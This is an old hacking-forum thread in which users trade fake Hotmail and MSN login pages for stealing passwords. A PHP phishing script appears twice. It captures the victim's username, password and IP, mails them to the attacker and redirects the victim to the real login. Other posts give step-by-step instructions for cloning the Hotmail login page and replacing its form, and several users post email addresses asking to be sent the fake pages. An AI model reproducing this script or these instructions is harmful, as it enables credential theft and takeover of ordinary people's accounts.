:cool: hahaha....i know how to make fake login hotmail screen that provides me the password of the victim in a second:cool:
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:cool: hahaha....i know how to make fake login hotmail screen that provides me the password of the victim in a second:cool:
Hm.. I was thinking about locking this thread too, but I'll give it another page and see if anything intelligent (besides mike and a few others' posts) show up.
hi i got the php but it dont work i got it from some here but not sure. i'll tell you the script and could you please tell me what im doing wrong.
if (getenv(HTTP_X_FORWARDED_FOR)){
$ip = getenv(HTTP_X_FORWARDED_FOR); } else {
$ip = getenv(REMOTE_ADDR); }
$td = date("F jS");
$date = date("d M, Y");
$time = date("g:i a");
$LogTime = trim(" Date: ".$date.", Time: ".$time);
$yourmail = "your email adress";
mail("$yourmail", "
$naam. Hotmail Account Details [url]www.elitec0ders.net[/url].
$yourmail", "Username : $name \n Password: $PASS \n User Ip Address : $ip \n Logtime : $LogTime \n Agent : $useragent \n \n Done by Mitchell ");
header( "Location: https://loginnet.passport.com/ppsecure/post.srf?lc=2057&id=2&ru=http://www.hotmail.msn.com/cgi-bin/sbox%*f_lang%*dEN%266c6f7264%*dhttp://www.msn.co.uk&tw=20&cbid=24*25&da=passport.com&kpp=2&svc=mail&msppjph=*");
hey guys just copy the source of the page in your hard disk and edit the form part i mean just make your form and put it in place of real form:p
Hey, when you click "Generate" on hotmail gen where are the files generated?!
hey dude look at the directory where u have installed hotmail generator and if u have any problem i can provide u my fake login page thanks....and also plz tell me if u have any cool idea or software
I do have a problem - firstly Norton detects the program as a Trojan and secondly when I disable Norton and I use hotmail generator, I don't know what to type where that "gmail" address is provided, and when I click generate nothing comes up and I don't know what to do. :confused:
that fake login generator from elitecoders is indeed inffected. Do not use those fake gen. To make a fake login page do this:
My example will be with Hotmail.com
visit hotmail.com
right click and click "view source"
copy the code
open notepad
paste the code
now look in the code for <form action="****************xxx"/cgi-bin/form.pl" method="post"> in that area is where you need to add your own code(form) to make the php send the logs to your email.
Why i don't type the code here? because the best way to learn is by effort. Google will give you guys great info on forms and php's
my 2 cents
:D hey guys just copy the source and delete the real form and paste your own made form with password field and edit the input type = text as "password"
now edit the submit button of your form as sign in and after that just copy your edited source code and upload it....if u have any problem contact me.:D
[QUOTE=mitch04;*8654]hi i got the php but it dont work i got it from some here but not sure. i'll tell you the script and could you please tell me what im doing wrong.
if (getenv(HTTP_X_FORWARDED_FOR)){
$ip = getenv(HTTP_X_FORWARDED_FOR); } else {
$ip = getenv(REMOTE_ADDR); }
$td = date("F jS");
$date = date("d M, Y");
$time = date("g:i a");
$LogTime = trim(" Date: ".$date.", Time: ".$time);
$yourmail = "your email adress";
mail("$yourmail", "
$naam. Hotmail Account Details [url]www.elitec0ders.net[/url].
$yourmail", "Username : $name \n Password: $PASS \n User Ip Address : $ip \n Logtime : $LogTime \n Agent : $useragent \n \n Done by Mitchell ");
header( "Location: https://loginnet.passport.com/ppsecure/post.srf?lc=2057&id=2&ru=http://www.hotmail.msn.com/cgi-bin/sbox%*f_lang%*dEN%266c6f7264%*dhttp://www.msn.co.uk&tw=20&cbid=24*25&da=passport.com&kpp=2&svc=mail&msppjph=*");
hey mitch i am anurag i hve sended you a private message with fake login screen url plz see:D
plz send it to my account [EMAIL="farazwaseem*4@hotmail.com"]farazwaseem*4@hotmail.com[/EMAIL]
if u send it to my id ill give u $5
hi there i want the fake msn screen if possible??
my email is [email]piniros@iprimus.com.au[/email]
I have 5 days chating with someone that said to me that will kill me.
But I want to know who he is.
Please give that to me if possible.
With respect : akili@matrix.
my adress [email]akili-matrix_hacker@hotmail.com[/email]
just stop chatting with him.:D
could u plz send me the fake msn site. thnx
My email is [email]lhartshorn_wwe@hotmail.com[/email]